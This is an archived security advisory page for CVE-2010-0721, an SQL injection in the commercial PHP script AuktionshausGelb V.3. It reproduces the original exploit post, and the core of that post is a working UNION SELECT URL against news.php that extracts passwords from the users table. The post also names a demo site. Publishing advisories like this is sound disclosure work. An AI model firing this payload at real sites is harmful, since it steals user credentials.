|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
If you have found a vulnerability, please send to our SecurityAlert Database : secalert()securityreason()com
Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com |
|
|
Home SecurityAlert Database |
|
|
Topic : | AuktionshausGelb V.3 SQL Injection news.php
|
SecurityAlert : 7064
CVE : CVE-2010-0721
CWE : CWE-89
SecurityRisk : High (About)
Remote Exploit : Yes
Local Exploit : No
Victim interaction required : No
Exploit Available : Yes
Credit : Easy Laster
Published : 03.03.2010
Affected Software : | systemsoftware.mobi:auktionshaus_gelb:3.0 |
 Advisory Content : # Exploit Title: AuktionshausGelb V.3 SQL Injection news.php
# Date: 17.02.2010
# Author: Easy Laster
# Tested on: windows xp
########################################################################
##AuktionshausGelb V.3 SQL Injection news.php ##
########################################################################
########################################################################
## _ _ _ _ ##
##| |_ ___ ___ _____ ___|_|___| |_ ___ ___ ___ ___| |_ ##
##| _| -_| .'| |___| | | _| -_| _| | -_| _| ##
##|_| |___|__,|_|_|_| |_|_|_|_| |___|_| |_|_|___|_| ##
## ##
########################################################################
##########################################################################
#Script: Auktionshaus Gelb V.3 #
#Vulnerabilities [ SQL Injection ] #
#Language: [ PHP ] #
#Download: [ buy this script ] #
#Founder: [ ea$y laster ] #
#Peace to [ -tmh- ,0qwl ,Crypter ,Dr.ChAoS ,dremicz ,eddy14 ,HANNIBAL ] #
#[ Lidloses_Auge ,n00bor, Rip ,Sens0r ,-=Player=-] #
#Price: [ Commercial License EUR 249.90 �
#
#DEMO : http://xmedien.e-ee.de/auktion3/ #
###########################################################################
##
#http://[demo].de/news.php?id=-1+union+select+1,2,password,4,5+from+users+-
-#
###########################################################################
##
References :
http://xforce.iss.net/xforce/xfdb/56332
http://www.exploit-db.com/exploits/11488
http://packetstormsecurity.org/1002-exploits/auktionshausgelb-sql.txt
Feedback :
If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
|
|
|
|